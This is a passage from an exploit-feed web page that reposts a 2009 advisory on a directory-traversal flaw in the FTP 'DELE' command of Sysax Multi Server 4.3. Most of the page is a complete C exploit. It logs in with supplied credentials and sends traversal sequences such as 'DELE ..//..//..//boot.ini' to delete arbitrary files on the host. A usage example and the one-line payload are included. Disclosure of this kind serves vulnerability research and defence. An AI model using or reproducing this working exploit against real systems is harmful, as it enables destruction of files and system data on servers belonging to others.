No account yet?
Home » Exploits » Sysax Multi Server FTP 'DELE' Directory Traversal Vulnerability
Sysax Multi Server FTP 'DELE' Directory Traversal Vulnerability E-mail
Feeds - Exploits
Written by Jonathan Salwan   
Wednesday, 25 March 2009 22:41
Sysax Multi Server FTP 'DELE' Directory Traversal Vulnerability


-\\Bugtraq ID:
34209

-\\Class:
Input Validation Error

-\\CVE:


-\\Remote:
Yes

-\\Local:
No

-\\Published:
Mar 23 2009 12:00AM

-\\Updated:
Mar 25 2009 04:46PM

-\\Credit:
Jonathan Salwan



-\\Vulnerable:
Codeorigin Sysax Multi Server  4.3



-\\Discussion
Sysax Multi Server is prone to a directory-traversal vulnerability because it fails to
sufficiently sanitize user-supplied input.

Exploiting this issue can allow a remote attacker to access arbitrary files outside of
the FTP server root directory. This can expose sensitive information that could help the
attacker launch further attacks.

Sysax Multi Server 4.3 is vulnerable; other versions may also be affected.



-\\Exploit(s)/PoC(s):
The following exploit code is available:

===============================================================
34209.c
^^^^^^^^
/*
Sysax Multi Server v4.3 Remote Delete Files.
Server FTP.
http://www.sysax.com/

-------------------------------------------------------------------------------------
A vulnerability is caused due to an input validation error when handling FTP "DELE"
requests. This can be exploited to escape the FTP root and delete arbitrary files on
the system via directory traversal attacks using the "..//" character sequence.
-------------------------------------------------------------------------------------

You can delet file boot.ini => DELE ..//..//..//..//..//..//boot.ini


Author: Jonathan Salwan
Mail  : submit [AT] shell-storm.org
Web   : http://www.shell-storm.org
*/

#include "stdio.h"
#include "unistd.h"
#include "stdlib.h"
#include "sys/types.h"
#include "sys/socket.h"
#include "netinet/in.h"

int syntax(char *file)
    {
    fprintf(stderr,"Sysax Multi Server v4.3 Remote Delete Files\n");
    fprintf(stderr,"=>Syntax  : <%s> <ip> <port> <login> <passwd> <file>\n",file);
    fprintf(stdout,"=>Exemple : %s 127.0.0.1 21 login1 password1 ..//..//..//boot.ini\n",file);
    exit(0);
    }

int main(int argc, char **argv)
{
    if (argc < 5)
        syntax(argv[0]);
    
    int port = atoi(argv[2]);

    int mysocket;
    int mysocket2;
    int srv_connect;
    int sockaddr_long;


        struct sockaddr_in sockaddr_mysocket;
        sockaddr_long = sizeof(sockaddr_mysocket);
        sockaddr_mysocket.sin_family = AF_INET;
        sockaddr_mysocket.sin_addr.s_addr = inet_addr(argv[1]);
        sockaddr_mysocket.sin_port = htons(port);

        char request[50];
    char answer[100];

        fprintf(stdout,"[+]Connect to Server %s\n",argv[1]);

                mysocket2 = socket(AF_INET, SOCK_STREAM, 0);
                        if(mysocket2 == -1){
                        fprintf(stderr,"[-]FAILED SOCKET\n");
            return 1;}

    srv_connect = connect(mysocket2, (struct sockaddr*)&sockaddr_mysocket, sockaddr_long);
        
    if (srv_connect != -1)
         {    

        sprintf(request, "USER %s\r\n", argv[3]);        
            if (send(mysocket2,request,strlen(request),0) == -1){
                fprintf(stderr,"[-]Send Request USER\t\t[FAILED]\n");
                shutdown(mysocket2,1);
                return 1;}
            else{
                memset(answer,0,100);
                recv(mysocket2,answer,sizeof(answer),0);
             }


        sprintf(request, "PASS %s\r\n", argv[4]);
                        if (send(mysocket2,request,strlen(request),0) == -1){
                                fprintf(stderr,"[-]Send Request PASS\t\t[FAILED]\n");
                                shutdown(mysocket2,1);
                                return 1;}
                        else{
                memset(answer,0,100);
                                recv(mysocket2,answer,sizeof(answer),0);
                                fprintf(stdout,"[+]>>%s",answer);
                         }


                sprintf(request, "SYST\r\n");
                        if (send(mysocket2,request,strlen(request),0) == -1){
                                fprintf(stderr,"[-]Send Request PASS\t\t[FAILED]\n");
                                shutdown(mysocket2,1);
                                return 1;}
                        else{
                                memset(answer,0,100);
                                recv(mysocket2,answer,sizeof(answer),0);
                                fprintf(stdout,"[+]>>%s",answer);
                         }


        sprintf(request, "DELE %s\r\n", argv[5]);
                        if (send(mysocket2,request,strlen(request),0) == -1){
                                fprintf(stderr,"[-]Send Request DELE\t\t[FAILED]\n");
                                shutdown(mysocket2,1);
                                return 1;}
                        else{
                memset(answer,0,100);
                                recv(mysocket2,answer,sizeof(answer),0);
                                fprintf(stdout,"[+]>>%s",answer);
                         }
                
            
        }
    else{
        fprintf(stderr,"[-]Connect\t\t[FAILED]\n");
        shutdown(mysocket2,1);
        return 1;}


    shutdown(mysocket2,1);


fprintf(stdout,"[+]Done! %s has been deleted\n", argv[5]);
return 0;
}





-\\Solution
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or
if you are aware of more recent information, please mail us at: This e-mail address is being protected from spambots. You need JavaScript enabled to view it .



-\\References(s)
--Sysax Homepage
http://www.sysax.com  (Codeorigin)
 

Security Services by HSC

Contact us

Become partner
Advertise with us
Join our staff